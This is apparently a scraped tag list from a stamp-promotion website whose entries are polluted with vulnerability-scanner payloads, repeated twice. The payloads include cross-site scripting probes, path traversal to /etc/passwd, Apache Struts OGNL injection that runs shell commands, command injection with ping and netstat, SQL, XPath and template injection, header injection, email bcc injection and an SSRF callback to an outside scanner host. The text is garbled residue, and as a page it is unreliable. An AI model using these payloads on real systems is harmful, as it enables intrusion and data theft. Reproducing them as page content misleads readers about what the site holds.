Ads express_promotion express_campaign express_estamp Express_E-stamp keymessage express_campigne howtogetestamp SXGP_E-stamp extrastamp_r8 extrastamp_r9 Promotion_E-Stamp E-Stamp_Promotion e-stamp_promtion stamp_promotion extra_stamp collection2 extra_stamp_launch_tvc15s extra_stamp_salehere " class="scroll-links">"> z--> " class="scroll-links">"'> [removed] " class="scroll-links">[removed]" SRC=//localhost/j> <[removed]qss=7;//<[removed]" class="scroll-links">"'><[removed]qss=7;//<[removed] <META HTTP-EQUIV="refresh" C> <STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE> <EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED> " class="scroll-links">"'> ' onEvent=X150750924Y4Z " onEvent=X150750924Y4Z < script a=4>qss=7< /script> [removed]_q(y)[removed] <script src=http://localhost/j qss{{q=(2*2.0)}}qss q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../etc/passwd //..//..//..//..//..//..//..//etc/passwd //....//....//....//....//....//....//....//etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ ";(function(){qxss});// ");(function(){qxss});// ';(function(){qxss});// 9;(function(){qxss});// 9 ;(function(){qxss});// '-qxss()-' */;(function(){qxss});/* "-qxss()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) aaaa&ping; -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| " class="scroll-links">"'> ' onEvent=X159895492Y4Z " onEvent=X159895492Y4Z " class="scroll-links">"'> ' onEvent=X152955000Y4Z " onEvent=X152955000Y4Z " class="scroll-links">"> " class="scroll-links">'"--!> " class="scroll-links">'"> round2 " class="scroll-links">"'> ' 
onEvent=X172006160Y4Z " onEvent=X172006160Y4Z was<!--esx-->esi" class="scroll-links">qualyswas<!--esx-->esi round3 round4 stam_promotion round5 phase2_extra_stamp extra_stamp_paepro_phase2 " class="scroll-links">collection2"'> [removed]_q=random(X144331948Y4Z)[removed] collection2 [removed]_q_q=random()[removed]
" class="scroll-links">collection2">
" class="scroll-links">"'> ' onEvent=X144331948Y4Z " onEvent=X144331948Y4Z collection2' [removed]qxss(X144331948Y4Z); <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> collection2') or 2634=2634 -- collection2') and 2634=1123 -- collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124 collection2' or 3789=3789 -- collection2' and 3789=1391 -- collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390 collection2 or 4325=4325 -- collection2 and 4325=2728 -- collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729 collection2 or NULL IS NULL collection2 or 6248 IS NULL collection2 oR 6248=2491 + 3757 collection2 and NULL IS NULL collection2 and 7248 IS NULL collection2 aND 7248=2491 + 4757 collection2') or 'swqtp'='swqtp collection2') and 'swqtp'='ptqws collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws collection2' or 'tpklq'='tpklq collection2' and 'tpklq'='xqlkp collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp collection21 or 11=11 collection21 or 11=12 collection25 oR 9=8 + 1 collection2' or true() or 'and' = 'and collection2' and false() and 'or' = 'and collection2' or not(false()) or 'true' = 'true collection2 or true() or 'and' = 'and' collection2 and false() and 'or' = 'and' collection2 or not(false()) or 'true' = 'true' collection2" or true() or "and" = "and collection2" and false() and "or" = "and collection2" or not(false()) or "true" = "true collection2WAITFOR DELAY '00:00:29' collection2;WAITFOR DELAY '00:00:29'; collection2);WAITFOR DELAY '00:00:29'-- collection2';WAITFOR DELAY '00:00:29'-- collection2');WAITFOR DELAY '00:00:29'-- collection2',0,0);WAITFOR DELAY'00:00:29'-- collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' collection2;SELECT sleep(29); -- collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ 
collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) stampx2_teaser extra_stamp_wongnaibeauty_phase2 [removed]_q=random(X157307652Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X157307652Y4Z " onEvent=X157307652Y4Z [removed]qxss(X157307652Y4Z); [removed]_q=random(X141291600Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X141291600Y4Z " onEvent=X141291600Y4Z [removed]qxss(X141291600Y4Z); logos [removed]_q=random(X170296576Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X170296576Y4Z " onEvent=X170296576Y4Z [removed]qxss(X170296576Y4Z); round6 [removed]alert(!)" class="scroll-links">">[removed]alert(!) round7 collection2" [removed]_q=random(X167091256Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X167091256Y4Z " onEvent=X167091256Y4Z [removed]qxss(X167091256Y4Z); round8 drive_redemption [removed]_q=random(X154591620Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X154591620Y4Z " onEvent=X154591620Y4Z [removed]qxss(X154591620Y4Z); ";(function(){qxss});/**/" ");(function(){qxss});/**/" ';(function(){qxss});/**/' [removed][removed]function(){qxss};[removed] extra_stamp_launch_tvc7515s [removed]_q=random(X169005532Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X169005532Y4Z " onEvent=X169005532Y4Z [removed]qxss(X169005532Y4Z); Joe+ bcc:was_engine@43523ba27bc7cc52db017c055f2865a7ebf72f6b.8237785_9490670.3713429209.smtphi01.smtp.eu1.qualysperiscope.com. [removed]_q=random(X153562356Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X153562356Y4Z " onEvent=X153562356Y4Z [removed]qxss(X153562356Y4Z); Joe+ bcc:was_engine@82b35fd8fe4d4202448e836d0f55bdc56d253b09.8284181_9490670.1742545902.smtphi01.smtp.eu1.qualysperiscope.com. 
[removed]_q=random(X148104920Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X148104920Y4Z " onEvent=X148104920Y4Z [removed]qxss(X148104920Y4Z); Joe+ bcc:was_engine@904ed77e46d1cfdfcf282ae362044ed5a92623ce.8286635_9490670.1721903345.smtphi01.smtp.eu1.qualysperiscope.com. http://ecce289c142cb6e9160284acf7ca0492209293c6.8286635_9490670.3085565927.ssrf01.ssrf.eu1.qualysperiscope.com. collection2WAITFOR DELAY '00:00:31' collection2;WAITFOR DELAY '00:00:31'; collection2);WAITFOR DELAY '00:00:31'-- collection2';WAITFOR DELAY '00:00:31'-- collection2');WAITFOR DELAY '00:00:31'-- collection2',0,0);WAITFOR DELAY'00:00:31'-- collection2 + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_1111) collection2' + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_2222) + ' collection2;SELECT sleep(31); -- collection2(SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR"*/ collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(30*1000)) lastday_stampcolleciton
,z-->,"'>,[removed],[removed]" SRC=//localhost/j>,"'><[removed]qss=7;//<[removed],,<META HTTP-EQUIV="refresh" C>,<STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE>,<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>,"'>,' onEvent=X150750924Y4Z ," onEvent=X150750924Y4Z ,< script a=4>qss=7< /script>,[removed]_q(y)[removed],<script src=http://localhost/j ,qss{{q=(2*2.0)}}qss,q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA,q Qualys_resp_hdr_injection: Vulnerable,q Qualys_resp_hdr_injection: Vulnerable ,;-- ,#,/*,``,,,(,1e309,/../../../../../../../etc/passwd,../../../../../../../etc/passwd,//..//..//..//..//..//..//..//etc/passwd,//....//....//....//....//....//....//....//etc/passwd,../../../../../../../Windows/System32/drivers/etc/hosts,%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))},a(){}phpinfo(); function a,|netstat -an ,http://rfitest/,";(function(){qxss});//,");(function(){qxss});//,';(function(){qxss});//,9;(function(){qxss});//,9 ;(function(){qxss});//,'-qxss()-',*/;(function(){qxss});/*,"-qxss()-", |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>,{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}},;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */,(23.0231*213.759),aaaa&ping; -n 92 localhost&,ping -c2 -i91 localhost,|ping -c2 -i91 localhost,|ping -c2 -i91 localhost|,"'>,' onEvent=X159895492Y4Z ," onEvent=X159895492Y4Z ,"'>,' onEvent=X152955000Y4Z ," onEvent=X152955000Y4Z ,">,'"--!>,'">,round2,"'>,' onEvent=X172006160Y4Z ," onEvent=X172006160Y4Z 
,qualyswas<!--esx-->esi,round3,round4,stam_promotion,round5,phase2_extra_stamp,extra_stamp_paepro_phase2,collection2"'>,[removed]_q=random(X144331948Y4Z)[removed],collection2 [removed]_q_q=random()[removed],collection2">
,"'>,' onEvent=X144331948Y4Z ," onEvent=X144331948Y4Z ,collection2',[removed]qxss(X144331948Y4Z);,<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->,collection2') or 2634=2634 -- ,collection2') and 2634=1123 -- ,collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124,collection2' or 3789=3789 -- ,collection2' and 3789=1391 -- ,collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390,collection2 or 4325=4325 -- ,collection2 and 4325=2728 -- ,collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729,collection2 or NULL IS NULL ,collection2 or 6248 IS NULL ,collection2 oR 6248=2491 + 3757 ,collection2 and NULL IS NULL ,collection2 and 7248 IS NULL ,collection2 aND 7248=2491 + 4757 ,collection2') or 'swqtp'='swqtp,collection2') and 'swqtp'='ptqws,collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws,collection2' or 'tpklq'='tpklq,collection2' and 'tpklq'='xqlkp,collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp,collection21 or 11=11,collection21 or 11=12,collection25 oR 9=8 + 1,collection2' or true() or 'and' = 'and,collection2' and false() and 'or' = 'and,collection2' or not(false()) or 'true' = 'true,collection2 or true() or 'and' = 'and' ,collection2 and false() and 'or' = 'and' ,collection2 or not(false()) or 'true' = 'true' ,collection2" or true() or "and" = "and,collection2" and false() and "or" = "and,collection2" or not(false()) or "true" = "true,collection2WAITFOR DELAY '00:00:29',collection2;WAITFOR DELAY '00:00:29';,collection2);WAITFOR DELAY '00:00:29'-- ,collection2';WAITFOR DELAY '00:00:29'-- ,collection2');WAITFOR DELAY '00:00:29'-- ,collection2',0,0);WAITFOR DELAY'00:00:29'-- ,collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ,collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ',collection2;SELECT sleep(29); --,collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- 
OR"*/,collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)),stampx2_teaser,extra_stamp_wongnaibeauty_phase2,[removed]_q=random(X157307652Y4Z)[removed],"'>,' onEvent=X157307652Y4Z ," onEvent=X157307652Y4Z ,[removed]qxss(X157307652Y4Z);,[removed]_q=random(X141291600Y4Z)[removed],"'>,' onEvent=X141291600Y4Z ," onEvent=X141291600Y4Z ,[removed]qxss(X141291600Y4Z);,logos,[removed]_q=random(X170296576Y4Z)[removed],"'>,' onEvent=X170296576Y4Z ," onEvent=X170296576Y4Z ,[removed]qxss(X170296576Y4Z);,round6,">[removed]alert(!),round7,collection2",[removed]_q=random(X167091256Y4Z)[removed],"'>,' onEvent=X167091256Y4Z ," onEvent=X167091256Y4Z ,[removed]qxss(X167091256Y4Z);,round8,drive_redemption,[removed]_q=random(X154591620Y4Z)[removed],"'>,' onEvent=X154591620Y4Z ," onEvent=X154591620Y4Z ,[removed]qxss(X154591620Y4Z);,";(function(){qxss});/**/",");(function(){qxss});/**/",';(function(){qxss});/**/',[removed][removed]function(){qxss};[removed],extra_stamp_launch_tvc7515s,[removed]_q=random(X169005532Y4Z)[removed],"'>,' onEvent=X169005532Y4Z ," onEvent=X169005532Y4Z ,[removed]qxss(X169005532Y4Z);,Joe+ bcc:was_engine@43523ba27bc7cc52db017c055f2865a7ebf72f6b.8237785_9490670.3713429209.smtphi01.smtp.eu1.qualysperiscope.com.,[removed]_q=random(X153562356Y4Z)[removed],"'>,' onEvent=X153562356Y4Z ," onEvent=X153562356Y4Z ,[removed]qxss(X153562356Y4Z);,Joe+ bcc:was_engine@82b35fd8fe4d4202448e836d0f55bdc56d253b09.8284181_9490670.1742545902.smtphi01.smtp.eu1.qualysperiscope.com.,[removed]_q=random(X148104920Y4Z)[removed],"'>,' onEvent=X148104920Y4Z ," onEvent=X148104920Y4Z ,[removed]qxss(X148104920Y4Z);,Joe+ 
bcc:was_engine@904ed77e46d1cfdfcf282ae362044ed5a92623ce.8286635_9490670.1721903345.smtphi01.smtp.eu1.qualysperiscope.com.,http://ecce289c142cb6e9160284acf7ca0492209293c6.8286635_9490670.3085565927.ssrf01.ssrf.eu1.qualysperiscope.com.,collection2WAITFOR DELAY '00:00:31',collection2;WAITFOR DELAY '00:00:31';,collection2);WAITFOR DELAY '00:00:31'-- ,collection2';WAITFOR DELAY '00:00:31'-- ,collection2');WAITFOR DELAY '00:00:31'-- ,collection2',0,0);WAITFOR DELAY'00:00:31'-- ,collection2 + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_1111) ,collection2' + (SELECT 0 FROM (SELECT SLEEP(31))qsqli_2222) + ',collection2;SELECT sleep(31); --,collection2(SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(31))qsqli_3333); -- OR"*/,collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(30*1000)),lastday_stampcolleciton">

